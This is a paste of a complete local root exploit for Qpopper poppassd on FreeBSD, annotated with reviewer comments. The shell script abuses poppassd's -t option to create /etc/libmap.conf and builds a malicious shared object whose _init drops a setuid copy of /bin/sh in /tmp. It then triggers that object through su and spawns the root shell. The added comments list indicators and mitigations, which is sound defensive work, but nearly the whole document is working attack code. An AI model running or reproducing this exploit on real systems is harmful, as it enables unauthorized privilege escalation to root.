blogfakessh

#bsd

Dec 25th, 2015
  1. ========================================================
  2. Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)
  3. ========================================================
  4.  
  5.  
  6. #!/bin/sh
  7. ###########################################################################
  8. # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ###
  9. # tested on FreeBSD 5.4-RELEASE ###
  10. ###########################################################################
      #
      # Reviewer summary (defensive reading of this listing):
      #   What it does: local privilege-escalation proof of concept. It has
      #   poppassd create /etc/libmap.conf through its -t option, writes a
      #   library mapping into that file, then runs su so that a locally built
      #   shared object gets loaded in place of the mapped library.
      #   Precondition not shown here: poppassd must run with elevated
      #   privilege (presumably installed setuid root) for a file under /etc
      #   to be created at all -- confirm against the installed binary's mode.
      #   Host indicators: /etc/libmap.conf appearing or changing unexpectedly,
      #   a shared object at /tmp/libno_ex.so.1.0, a set-id copy of /bin/sh at
      #   /tmp/xxxx.
      #   Mitigation: remove the set-id bit from poppassd or move off the
      #   affected versions named in the banner (<= 4.0.8). Mounting /tmp
      #   nosuid is not a sufficient fix; the root cause is the privileged
      #   file creation, not the dropped shell copy.
  11.  
      # Fixed inputs: the poppassd binary to invoke and the library name that
      # the mapping line written further down will redirect.
  12. POPPASSD_PATH=/usr/local/bin/poppassd
  13. HOOKLIB=libutil.so.4
  14.  
  15. echo ""
  16. echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
  17. echo ""
  18. sleep 2
      # With umask 0000 no permission bits are masked on files created from
      # here on. Presumably this is what leaves the file created by poppassd
      # writable by the invoking user -- TODO confirm against the mode
      # poppassd passes when it opens the -t target.
  19. umask 0000
      # Stops early when /etc/libmap.conf already exists; the script only
      # handles the case where that file is absent beforehand.
  20. if [ -f /etc/libmap.conf ]; then
  21. echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
  22. exit
  23. fi
      # Writes C source to program.c in the current directory. The heredoc
      # delimiter is unquoted, so the shell would expand $ and backquotes in
      # the body; the body contains neither. The _init() it defines checks
      # geteuid() == 0, then deletes /etc/libmap.conf and runs a shell command
      # that copies /bin/sh to /tmp/xxxx and applies chmod +xs to the copy.
  24. cat > program.c << _EOF
  25. #include <unistd.h>
  26. #include <stdio.h>
  27. #include <sys/types.h>
  28. #include <stdlib.h>
  29.  
  30. void _init()
  31. {
  32. if (!geteuid()) {
  33. remove("/etc/libmap.conf");
  34. execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
  35. }
  36. }
  37.  
  38. _EOF
      # Compiles program.c as position-independent code, links it into a shared
      # object with soname libno_ex.so.1, and copies the result to a fixed path
      # in /tmp. None of these commands has its exit status checked.
  39. gcc -o program.o -c program.c -fPIC
  40. gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
  41. cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
  42. echo "--- Now type ENTER ---"
  43. echo ""
      # Runs poppassd with -t naming /etc/libmap.conf. The prompt above suggests
      # poppassd waits on stdin and is ended by hand.
      # NOTE(review): the meaning of -t is not shown in this file -- confirm in
      # the poppassd documentation.
  44. $POPPASSD_PATH -t /etc/libmap.conf
      # Overwrites /etc/libmap.conf with one mapping line: $HOOKLIB followed by
      # the /tmp library, written as a ../ relative path. Both variables are
      # expanded unquoted; with the fixed values above no word splitting occurs.
  45. echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
      # su is started after the mapping is in place. Presumably su is setuid
      # root and links against $HOOKLIB, so the dynamic linker applies the
      # mapping to it -- neither fact is shown in this file.
  46. su
      # The outcome is judged only by whether /tmp/xxxx exists. For defenders, a
      # set-id copy of a shell under /tmp is a strong host indicator.
  47. if [ -f /tmp/xxxx ]; then
  48. echo "IT'S A ROOTSHELL!!!"
  49. /tmp/xxxx
  50. else
  51. echo "Sorry, exploit failed."
  52. fi
  53.  
  54.  
  55.  
  56. # 056FE58749E5C4AA 1337day.com [2014-09-08] 3CFC11BFC696FCE0 #